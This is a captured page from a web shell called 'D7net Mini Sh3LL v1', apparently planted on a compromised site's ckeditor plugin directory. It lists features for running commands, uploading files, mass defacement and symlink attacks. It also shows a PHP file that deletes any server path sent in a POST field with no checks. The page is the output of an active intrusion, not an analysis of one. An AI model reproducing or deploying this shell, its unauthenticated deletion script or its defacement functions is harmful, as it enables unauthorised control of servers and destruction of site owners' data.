D7net Mini Sh3LL v1

 
ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF
Directory (0777) :  C:/Domains/maymaytinson.com/httpdocs/ckeditor/plugins/imgbrowse/../easyimage/../preview/../widget/../pastefromword/../imagebase/../image/../a11yhelp/../zamanager/commands/

 Home   ☍ Command   ☍ Upload File   ☍Info Server   ☍ Buat File   ☍ Mass deface   ☍ Jumping   ☍ Config   ☍ Symlink   ☍ About 

Current File : C:/Domains/maymaytinson.com/httpdocs/ckeditor/plugins/imgbrowse/../easyimage/../preview/../widget/../pastefromword/../imagebase/../image/../a11yhelp/../zamanager/commands/file_delete.php
<?php

$dir=$_POST['dir'];
if(!file_exists($dir)) {echo "File do not exists, or you probable choose directory. For Directory deletion use Dellete button below browser"; exit;}
unlink($dir) or die("Unable to delete file!".$name);
echo "File ".$name." was DELETED";

AnonSec - 2021 | Recode By D7net